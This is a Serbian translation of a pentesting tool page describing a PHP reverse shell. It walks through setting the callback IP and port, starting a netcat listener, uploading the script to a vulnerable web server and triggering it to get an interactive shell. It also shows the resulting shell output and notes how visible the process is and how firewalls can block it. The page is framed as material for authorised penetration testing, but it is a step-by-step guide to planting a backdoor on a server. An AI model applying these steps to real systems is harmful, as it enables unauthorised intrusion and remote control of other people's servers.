Back to site
Since 2004, our University project has become the Internet's most widespread web hosting directory. Here we like to talk a lot about web servers, web development, networking and security services. It is, after all, our expertise. To make things better we've launched this science section with the free access to educational resources and important scientific material translated to different languages.

php- obrnute- ljušture

Ovaj alat je namenjen za one situacije u toku testa propustljivosti gde možete postaviti imajući pristup web serveru koji je pokrenut PHP-om. Postavi ovu skriptu negde na web pretraživanju i onda ga pokreni pristupanjem na odgovarajuću URL adresu u vašem pretraživaču. Skripta će otvoriti izlaznu TCP konekciju sa web servera na glavni računar i priključak po vašem izboru. Vezana za ovu TCP konekcija će biti ljuštura.

To će biti prava interaktivna ljuštura na kojoj možete pokrenuti interaktivne programe kao što su telnet, ssh i su. To se razlikuje od web forme zasnovane ljušture koja vam omogućava da šaljete jednu komandu, a zatim se vratite na izlaz.

Preuzimanje

__________________________________________________________________________________________________________________________________________

php-reverse-shell-1.0.tar.gz

MD5sum:2bdf99cee7b302afdc45d1d51ac7e373

SHA1sum: 30a26d5b5e30d819679e0d1eb44e46814892a4ee

Video

__________________________________________________________________________________________________________________________________________

Naišao sam na ovaj video koji je neko napravio od php obrnute ljušture.

Ažurirano 2011-11: Imax mi je poslao link sa njegovog fimap alata koji koristi php obrnutu ljušturu. Izgleda odlično.

Šetnja kroz

__________________________________________________________________________________________________________________________________________

Izmenite izvor

Da biste sprečili da neko drugi zloupotrebljava vaša zadnja vrata - košmarni scenario, dok testirate propustljivost - morate da menjate izvorni kod i naznačite gde želite obrnutu ljušturu sa vraćenim rastojanjem. Izmenite sledeće redove php-obrnuta-ljuštura.php:

$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

Spremite se da uhvatite obrnutu ljušturu

Pokrenite TCP slušaoca na glavnom računaru i priključak koji će biti dostupan na web serveru. Koristite isti priključak kao što je navedeno u pismu u ( u ovom primeru 1234):

$ nc -v -n -l -p 1234

Postavi i pokreni scenario

Koristite sve da bi ste otkrili ranjivost na sajtu, pošaljite na server php-obrnutu-ljušturu.php. Pokrenite skriptu jednostavnim pregledanjem nove otpremljene datoteke u vašem web pretraživaču ( NB: Nećete videti izlaz na internet stranici, to će samo zavisiti od uspeha)

http://somesite/php-reverse-shell.php

Uživajte u novoj ljušturi

Ako je sve prošlo dobro, web server bi trebao da baci ljušturu nazad na vaš netcat slušaoca. Neke korisne komande poput w, uname -a, id i pwd se automatski pokreću za vas:

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 58012
Linux somehost 2.6.19-gentoo-r5 #1 SMP PREEMPT Sun Apr 1 16:49:38 BST 2007 x86_64 AMD
Athlon(tm) 64 X2 Dual Core Processor 4200+ AuthenticAMD GNU/Linux 16:59:28 up 39 days, 19:54, 2 users, load average: 0.18, 0.13, 0.10 USER TTY LOGIN@ IDLE JCPU PCPU WHAT root :0 19May07 ?xdm? 5:10m 0.01s /bin/sh uid=81(apache) gid=81(apache) groups=81(apache) sh: no job control in this shell sh-3.2$

Pitanja

__________________________________________________________________________________________________________________________________________

Kada je ovo bilo korisno?

Možda samo područja na disku imaju pristup za pisanje i montiranje za “noexec” opciju. Slanjem na udaljeni server sastavljeni program će biti od koristi u ovim situacijama. Morate da koristite instalirani jezik za skriptovanje kao Python, PERL, PHP, itd.

Možda jednostavno ne može da zasmeta da pošaljete na udaljeni server drugi program.

Zar jednostavno neće biti prekinuta konekcija ljušture kada istekne vreme PHP skripte na web serveru?

Ne. Izgleda da neće na sistemima koje sam testirao (Gentoo Linux samo do sada). Dodatno PHP skripta pokušava da demoniše i drži distancu od matičnog procesa da bi se ovo izbeglo ( mada se to retko radi u praksi). Vaš pretraživač će se pojaviti da bi zavisio kada pristupite obrnutoj ljušturi. To je normalno. To je u redu da pritisnete otkazivanje u vašem pretraživaču kada imate svoju ljušturu.

Neće li prilično sumljivo izgledati proces ljušture kada administrator vodi “ps”?

Da. Ova verzija obrnute ljušture nije baš suptilna.

apache   28106  0.0  0.0  10428  1216 ?        S    17:15   0:00 sh -c uname -a; w; id; /bin/sh -i
apache   28110  0.0  0.0  10172  1428 ?        S    17:15   0:00 /bin/sh -i

Upozorenja

__________________________________________________________________________________________________________________________________________

Izlazni fajervol ( tzv. izlaz filtriranja) može sprečiti vašu obrnutu ljušturu da dostigne konekciju. Odaberite priključak koji će omogućiti put kroz zaštitni zid. Ako ih nema, moraćete da učinite formu baziranu na PHP ljušturi.

Ova posebna primena obrnute ljušture bazirana je na unix-u. Moraćete da je modifikujete pre nego što počnete raditi na prozorima.

Primetio sam nekoliko zombi procesa dok sam testirao ovu ljušturu. To ne mora uvek da se desi, ali se verovatno očekuje, jer mi nismo demonski kako treba,

Tagovi: pentest , php, reverseshell , tool

Objavljeno u Web Shells





Published (Last edited): 24-12-2012 , source: http://pentestmonkey.net/tools/web-shells/php-reverse-shell